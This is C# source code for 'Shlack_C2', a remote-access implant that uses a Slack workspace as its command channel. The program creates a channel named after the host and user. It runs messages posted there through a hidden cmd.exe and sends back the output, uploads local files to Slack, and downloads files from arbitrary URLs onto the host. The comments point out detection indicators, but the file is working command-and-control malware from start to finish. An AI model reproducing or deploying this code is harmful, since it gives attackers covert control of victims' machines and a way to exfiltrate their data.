using System;
using System.Diagnostics;
using SlackAPI;
using System.Threading;
namespace Shlack_C2
{
/// <summary>
/// Console program that uses a Slack workspace as a remote command channel.
/// It connects with a bot token, creates (or reuses) a per-host channel and
/// treats every user message posted there as either a keyword command
/// (exit / upload / download) or a command line for cmd.exe.
/// </summary>
/// <remarks>
/// Observable behaviour visible in this file, useful for detection and triage:
/// two Slack tokens embedded as string literals; a channel named
/// "hostname_username" (lower-cased); status messages posted to the channel
/// named "general"; a hidden cmd.exe child process with redirected output;
/// files read from disk and uploaded to Slack; files fetched from arbitrary
/// URLs and written to disk.
/// </remarks>
class Program
{
/// <summary>
/// Connects to Slack, registers the message handler, creates the per-host
/// channel and then idles so the handler keeps running.
/// </summary>
/// <param name="args">Command-line arguments; not read by this method.</param>
static void Main(string[] args)
{
// Both credentials are compiled into the binary as literals, so anyone holding
// a sample can recover them and have them revoked in the Slack workspace.
string slack_token = "xoxb-TokenHere"; // placeholder for the bot token; replaced before deployment
string oauth_token = "xoxp-TokenHere"; // placeholder for the OAuth token used to create the channel
// Channel id the handler accepts commands from. It starts empty and is assigned
// in the ChannelsCreate callback below; the handler compares every incoming
// message's channel against it.
string targetID = "";
// Signalled from the Connect callback; Main blocks on it before using the client.
ManualResetEventSlim clientReady = new ManualResetEventSlim(false);
SlackSocketClient client = new SlackSocketClient(slack_token);
SlackSocketClient oauth_client = new SlackSocketClient(oauth_token);
client.Connect((connected) => {
// This is called once the client has emitted the RTM start command
clientReady.Set();
}, () => {
// This is called once the RTM client has connected to the end point
});
client.OnMessageReceived += (message) =>
{
// Act only on messages that carry no bot_id (i.e. not posted by a bot) and
// that arrive on the channel recorded in targetID.
if (message.bot_id == null && targetID == message.channel)
{
// Dispatch on the first space-separated word of the message, lower-cased.
switch (message.text.ToLower().Split(' ')[0])
{
case "exit": // Post a notice to the channel, then terminate the process
client.PostMessage(null, message.channel.ToString(), "Channel Terminated!");
Thread.Sleep(20);
Environment.Exit(1);
break;
case "upload": // Read a local file and upload it to the Slack channel (data leaves the host)
string[] ch = new string[1];
ch[0] = message.channel.ToString();
try
{
// Everything after the keyword is the path. The whole message is lower-cased
// first, so the path is lower-cased too.
string path = message.text.ToLower().Split(new[] { ' ' }, 2)[1];
client.UploadFile(null, System.IO.File.ReadAllBytes(path), System.IO.Path.GetFileName(path), ch);
}
catch (Exception e)
{
// Any failure (missing argument, unreadable file, ...) is reported back to the channel.
client.PostMessage(null, message.channel.ToString(), e.Message);
}
break;
case "download": // Fetch a URL and write it to a local path: download [URL] [NameOfFile/Path]
string @remoteUri = message.text.Split(new[] { ' ' }, 3)[1];
string @fileName = message.text.Split(new[] { ' ' }, 3)[2];
using (var down = new System.Net.WebClient())
{
try
{
// Strip angle brackets from the URL before use.
// NOTE(review): presumably because Slack wraps links in <...> - confirm.
remoteUri = remoteUri.Replace(">", "");
remoteUri = remoteUri.Replace("<", "");
// Neither the URL nor the destination path is validated; the file is written
// wherever the message says, with this process's privileges.
down.DownloadFile(@remoteUri, @fileName);
client.PostMessage(null, message.channel.ToString(), "Downloaded successfully.");
}
catch (Exception e)
{
client.PostMessage(null, message.channel.ToString(), e.Message.ToString());
}
break;
}
default: // No keyword matched: the full message text is run through cmd.exe
string output = Execute(message.text);
// The command output is posted back to the channel inside a code fence.
client.PostMessage(null, message.channel.ToString(), "```" + output + "```");
break;
}
}
};
clientReady.Wait();
// Channel name is "<hostname>_<username>" lower-cased, which identifies the host
// and account in the workspace's channel list.
string chan_name = (System.Net.Dns.GetHostName() + "_" + Environment.UserName).ToLower();
client.GetChannelList(null);
// Status messages go to the channel literally named "general".
var general = client.Channels.Find(x => x.name.Equals("general"));
oauth_client.ChannelsCreate((response) => { // Create the channel and assign targetID from the result
if (response.ok)
{
client.PostMessage(null, general.id, "[+] Channel " + chan_name + " is created. Have fun :)");
targetID = response.channel.id.ToString();
}
else if (response.error == "name_taken")
{
// The channel already exists: look up its id in the client's channel list and reuse it.
client.PostMessage(null, general.id, "[*] Channel " + chan_name + " is already exists.");
targetID = client.Channels.Find(x => x.name.Equals(chan_name)).id;
}
else
{
// Any other error is reported to "general"; targetID stays empty.
client.PostMessage(null, general.id, "[-] Channel " + chan_name + " " + response.error.ToString());
}
}, chan_name);
// Keep the process alive; all further work happens in the callbacks above.
while (true) { Thread.Sleep(1000); }
}
/// <summary>
/// Runs a command line through cmd.exe with no visible window and returns the
/// captured output.
/// </summary>
/// <param name="cmd">Command text taken from the Slack message; passed through Contaminate first.</param>
/// <returns>
/// Standard error followed by standard output of the child process, or the
/// exception message if starting or reading the process throws.
/// </returns>
/// <remarks>
/// The text comes straight from a chat message and is handed to the shell unchanged.
/// On the host this appears as a cmd.exe child of this program, started with "/c",
/// CreateNoWindow set and a hidden window style.
/// </remarks>
public static string Execute(string cmd)
{
cmd = Contaminate(cmd);
try
{
// Start the child process.
Process p = new Process();
// Redirect the output streams of the child process so they can be read here.
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.FileName = "cmd.exe";
// No console window is created for the child.
p.StartInfo.CreateNoWindow = true;
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.Arguments = "/c" + cmd;
p.Start();
// Do not wait for the child process to exit before
// reading to the end of its redirected stream.
// p.WaitForExit();
// Read the output stream first and then wait.
string output = p.StandardOutput.ReadToEnd();
string error = p.StandardError.ReadToEnd();
p.WaitForExit();
return error + output;
}
catch (Exception e)
{
// Failures are returned as text rather than thrown, so the caller posts them to the channel.
return e.Message;
}
}
/// <summary>
/// Applies three string replacements to the message text before it is executed.
/// </summary>
/// <param name="original">Message text as received.</param>
/// <returns>The text after the replacements.</returns>
/// <remarks>
/// NOTE(review): as shown here each Replace maps a character to itself, so the
/// method returns its input unchanged. The original comment says it "replaces
/// sanitized chars"; the search strings were probably HTML entities that were
/// decoded when this page was rendered - confirm against the raw file.
/// </remarks>
public static string Contaminate(string original)
{
string edited = original;
edited = edited.Replace(">", ">");
edited = edited.Replace("<", "<");
edited = edited.Replace("&", "&");
return edited;
}
}
}